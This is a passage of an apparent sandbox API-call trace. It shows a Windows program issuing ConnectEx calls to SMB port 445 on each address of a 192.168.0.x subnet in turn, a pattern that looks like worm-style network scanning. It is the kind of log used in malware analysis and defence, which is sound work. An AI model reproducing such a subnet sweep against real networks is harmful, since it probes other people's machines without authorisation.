s=0x540, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.158"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8d00 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.241] WSAGetLastError () returned 997 [0137.241] htons (hostshort=0x1bd) returned 0xbd01 [0137.241] ConnectEx (in: s=0x544, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.159"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8d30 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.241] WSAGetLastError () returned 997 [0137.241] htons (hostshort=0x1bd) returned 0xbd01 [0137.241] ConnectEx (in: s=0x548, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.160"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8d60 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.241] WSAGetLastError () returned 997 [0137.241] htons (hostshort=0x1bd) returned 0xbd01 [0137.241] ConnectEx (in: s=0x54c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.161"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8d90 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.242] WSAGetLastError () returned 997 [0137.242] htons (hostshort=0x1bd) returned 0xbd01 [0137.242] ConnectEx (in: s=0x550, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.162"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8dc0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.242] WSAGetLastError () returned 997 [0137.242] htons (hostshort=0x1bd) returned 0xbd01 [0137.242] ConnectEx (in: s=0x554, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.163"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8df0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.242] WSAGetLastError () returned 997 [0137.242] htons (hostshort=0x1bd) returned 0xbd01 [0137.242] ConnectEx (in: s=0x558, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.164"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8e20 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.242] WSAGetLastError () returned 997 [0137.242] htons (hostshort=0x1bd) returned 0xbd01 [0137.243] ConnectEx (in: s=0x55c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.165"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8e50 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.243] WSAGetLastError () returned 997 [0137.243] htons (hostshort=0x1bd) returned 0xbd01 [0137.243] ConnectEx (in: s=0x560, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.166"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8ea0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.243] WSAGetLastError () returned 997 [0137.243] htons (hostshort=0x1bd) returned 0xbd01 [0137.243] ConnectEx (in: s=0x564, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.167"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8ed0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.247] WSAGetLastError () returned 997 [0137.247] htons (hostshort=0x1bd) returned 0xbd01 [0137.247] ConnectEx (in: s=0x568, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.168"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8f00 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.247] WSAGetLastError () returned 997 [0137.247] htons (hostshort=0x1bd) returned 0xbd01 [0137.247] ConnectEx (in: s=0x56c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.169"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8f30 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.247] WSAGetLastError () returned 997 [0137.247] htons (hostshort=0x1bd) returned 0xbd01 [0137.247] ConnectEx (in: s=0x570, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.170"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8f60 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.248] WSAGetLastError () returned 997 [0137.248] htons (hostshort=0x1bd) returned 0xbd01 [0137.248] ConnectEx (in: s=0x574, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.171"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8f90 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.248] WSAGetLastError () returned 997 [0137.248] htons (hostshort=0x1bd) returned 0xbd01 [0137.248] ConnectEx (in: s=0x578, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.172"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8fc0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.248] WSAGetLastError () returned 997 [0137.248] htons (hostshort=0x1bd) returned 0xbd01 [0137.248] ConnectEx (in: s=0x57c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.173"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee8ff0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.249] WSAGetLastError () returned 997 [0137.249] htons (hostshort=0x1bd) returned 0xbd01 [0137.249] ConnectEx (in: s=0x580, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.174"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9020 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.249] WSAGetLastError () returned 997 [0137.249] htons (hostshort=0x1bd) returned 0xbd01 [0137.249] ConnectEx (in: s=0x584, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.175"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9050 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.249] WSAGetLastError () returned 997 [0137.249] htons (hostshort=0x1bd) returned 0xbd01 [0137.249] ConnectEx (in: s=0x588, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.176"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9080 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.249] WSAGetLastError () returned 997 [0137.250] htons (hostshort=0x1bd) returned 0xbd01 [0137.250] ConnectEx (in: s=0x58c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.177"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee90b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.250] WSAGetLastError () returned 997 [0137.250] htons (hostshort=0x1bd) returned 0xbd01 [0137.250] ConnectEx (in: s=0x590, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.178"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee90e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.250] WSAGetLastError () returned 997 [0137.250] htons (hostshort=0x1bd) returned 0xbd01 [0137.250] ConnectEx (in: s=0x594, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.179"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9110 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.250] WSAGetLastError () returned 997 [0137.250] htons (hostshort=0x1bd) returned 0xbd01 [0137.251] ConnectEx (in: s=0x598, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.180"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9140 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.251] WSAGetLastError () returned 997 [0137.251] htons (hostshort=0x1bd) returned 0xbd01 [0137.251] ConnectEx (in: s=0x59c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.181"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9170 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.251] WSAGetLastError () returned 997 [0137.251] htons (hostshort=0x1bd) returned 0xbd01 [0137.251] ConnectEx (in: s=0x5a0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.182"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee91a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.251] WSAGetLastError () returned 997 [0137.251] htons (hostshort=0x1bd) returned 0xbd01 [0137.251] ConnectEx (in: s=0x5a4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.183"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee91d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.252] WSAGetLastError () returned 997 [0137.252] htons (hostshort=0x1bd) returned 0xbd01 [0137.252] ConnectEx (in: s=0x5a8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.184"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9200 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.252] WSAGetLastError () returned 997 [0137.252] htons (hostshort=0x1bd) returned 0xbd01 [0137.252] ConnectEx (in: s=0x5ac, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.185"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9230 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.252] WSAGetLastError () returned 997 [0137.252] htons (hostshort=0x1bd) returned 0xbd01 [0137.252] ConnectEx (in: s=0x5b0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.186"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9260 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.253] WSAGetLastError () returned 997 [0137.253] htons (hostshort=0x1bd) returned 0xbd01 [0137.253] ConnectEx (in: s=0x5b4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.187"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9290 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.253] WSAGetLastError () returned 997 [0137.253] htons (hostshort=0x1bd) returned 0xbd01 [0137.253] ConnectEx (in: s=0x5b8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.188"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee92c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.253] WSAGetLastError () returned 997 [0137.253] htons (hostshort=0x1bd) returned 0xbd01 [0137.253] ConnectEx (in: s=0x5bc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.189"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee92f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.254] WSAGetLastError () returned 997 [0137.254] htons (hostshort=0x1bd) returned 0xbd01 [0137.254] ConnectEx (in: s=0x5c0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.190"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9320 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.254] WSAGetLastError () returned 997 [0137.254] htons (hostshort=0x1bd) returned 0xbd01 [0137.254] ConnectEx (in: s=0x5c4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.191"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9350 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.254] WSAGetLastError () returned 997 [0137.254] htons (hostshort=0x1bd) returned 0xbd01 [0137.254] ConnectEx (in: s=0x5c8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.192"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9380 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.255] WSAGetLastError () returned 997 [0137.255] htons (hostshort=0x1bd) returned 0xbd01 [0137.255] ConnectEx (in: s=0x5cc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.193"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee93b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.255] WSAGetLastError () returned 997 [0137.255] htons (hostshort=0x1bd) returned 0xbd01 [0137.255] ConnectEx (in: s=0x5d0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.194"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee93e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.255] WSAGetLastError () returned 997 [0137.255] htons (hostshort=0x1bd) returned 0xbd01 [0137.255] ConnectEx (in: s=0x5d4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.195"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9410 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.256] WSAGetLastError () returned 997 [0137.256] htons (hostshort=0x1bd) returned 0xbd01 [0137.256] ConnectEx (in: s=0x5d8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.196"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9440 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.256] WSAGetLastError () returned 997 [0137.256] htons (hostshort=0x1bd) returned 0xbd01 [0137.256] ConnectEx (in: s=0x5dc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.197"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9470 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.256] WSAGetLastError () returned 997 [0137.256] htons (hostshort=0x1bd) returned 0xbd01 [0137.256] ConnectEx (in: s=0x5e0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.198"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee94a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.257] WSAGetLastError () returned 997 [0137.257] htons (hostshort=0x1bd) returned 0xbd01 [0137.257] ConnectEx (in: s=0x5e4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.199"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee94d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.257] WSAGetLastError () returned 997 [0137.257] htons (hostshort=0x1bd) returned 0xbd01 [0137.257] ConnectEx (in: s=0x5e8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.200"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9500 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.257] WSAGetLastError () returned 997 [0137.257] htons (hostshort=0x1bd) returned 0xbd01 [0137.257] ConnectEx (in: s=0x5ec, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.201"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9530 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.258] WSAGetLastError () returned 997 [0137.258] htons (hostshort=0x1bd) returned 0xbd01 [0137.258] ConnectEx (in: s=0x5f0, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.202"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9560 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.258] WSAGetLastError () returned 997 [0137.258] htons (hostshort=0x1bd) returned 0xbd01 [0137.258] ConnectEx (in: s=0x5f4, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.203"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9590 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.258] WSAGetLastError () returned 997 [0137.258] htons (hostshort=0x1bd) returned 0xbd01 [0137.258] ConnectEx (in: s=0x5f8, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.204"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee95c0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.259] WSAGetLastError () returned 997 [0137.259] htons (hostshort=0x1bd) returned 0xbd01 [0137.259] ConnectEx (in: s=0x5fc, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.205"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee95f0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.259] WSAGetLastError () returned 997 [0137.259] htons (hostshort=0x1bd) returned 0xbd01 [0137.259] ConnectEx (in: s=0x600, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.206"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9620 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.259] WSAGetLastError () returned 997 [0137.259] htons (hostshort=0x1bd) returned 0xbd01 [0137.259] ConnectEx (in: s=0x604, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.207"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9650 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.260] WSAGetLastError () returned 997 [0137.260] htons (hostshort=0x1bd) returned 0xbd01 [0137.260] ConnectEx (in: s=0x608, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.208"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9ea0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.260] WSAGetLastError () returned 997 [0137.260] htons (hostshort=0x1bd) returned 0xbd01 [0137.260] ConnectEx (in: s=0x60c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.209"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9ed0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.260] WSAGetLastError () returned 997 [0137.260] htons (hostshort=0x1bd) returned 0xbd01 [0137.260] ConnectEx (in: s=0x610, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.210"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9f00 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.260] WSAGetLastError () returned 997 [0137.260] htons (hostshort=0x1bd) returned 0xbd01 [0137.261] ConnectEx (in: s=0x614, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.211"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9f30 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.261] WSAGetLastError () returned 997 [0137.261] htons (hostshort=0x1bd) returned 0xbd01 [0137.261] ConnectEx (in: s=0x618, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.212"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9f60 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.261] WSAGetLastError () returned 997 [0137.261] htons (hostshort=0x1bd) returned 0xbd01 [0137.261] ConnectEx (in: s=0x61c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.213"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9f90 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.261] WSAGetLastError () returned 997 [0137.261] htons (hostshort=0x1bd) returned 0xbd01 [0137.261] ConnectEx (in: s=0x620, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.214"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9fc0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.262] WSAGetLastError () returned 997 [0137.262] htons (hostshort=0x1bd) returned 0xbd01 [0137.262] ConnectEx (in: s=0x624, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.215"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xee9ff0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.262] WSAGetLastError () returned 997 [0137.262] htons (hostshort=0x1bd) returned 0xbd01 [0137.262] ConnectEx (in: s=0x628, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.216"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea020 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.263] WSAGetLastError () returned 997 [0137.263] htons (hostshort=0x1bd) returned 0xbd01 [0137.263] ConnectEx (in: s=0x62c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.217"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea050 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.263] WSAGetLastError () returned 997 [0137.263] htons (hostshort=0x1bd) returned 0xbd01 [0137.263] ConnectEx (in: s=0x630, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.218"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea080 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.263] WSAGetLastError () returned 997 [0137.263] htons (hostshort=0x1bd) returned 0xbd01 [0137.263] ConnectEx (in: s=0x634, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.219"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea0b0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.264] WSAGetLastError () returned 997 [0137.264] htons (hostshort=0x1bd) returned 0xbd01 [0137.264] ConnectEx (in: s=0x638, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.220"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea0e0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.264] WSAGetLastError () returned 997 [0137.264] htons (hostshort=0x1bd) returned 0xbd01 [0137.264] ConnectEx (in: s=0x63c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.221"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea110 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.264] WSAGetLastError () returned 997 [0137.264] htons (hostshort=0x1bd) returned 0xbd01 [0137.264] ConnectEx (in: s=0x640, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.222"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea140 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.265] WSAGetLastError () returned 997 [0137.265] htons (hostshort=0x1bd) returned 0xbd01 [0137.265] ConnectEx (in: s=0x644, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.223"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea170 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.265] WSAGetLastError () returned 997 [0137.265] htons (hostshort=0x1bd) returned 0xbd01 [0137.265] ConnectEx (in: s=0x648, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.224"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea1a0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.265] WSAGetLastError () returned 997 [0137.265] htons (hostshort=0x1bd) returned 0xbd01 [0137.265] ConnectEx (in: s=0x64c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.225"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea1d0 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.265] WSAGetLastError () returned 997 [0137.265] htons (hostshort=0x1bd) returned 0xbd01 [0137.266] ConnectEx (in: s=0x650, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.226"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea200 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.266] WSAGetLastError () returned 997 [0137.266] htons (hostshort=0x1bd) returned 0xbd01 [0137.266] ConnectEx (in: s=0x654, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.227"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea230 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.266] WSAGetLastError () returned 997 [0137.266] htons (hostshort=0x1bd) returned 0xbd01 [0137.266] ConnectEx (in: s=0x658, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.228"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x73dff38, lpOverlapped=0xeea260 | out: lpdwBytesSent=0x73dff38*=0xff000000) returned 0 [0137.266] WSAGetLastError () returned 997 [0137.266] htons (hostshort=0x1bd) returned 0xbd01 [0137.266] ConnectEx (in: s=0x65c, name=0x73dff3c*(sa_family=2, sin_port=0x1bd, 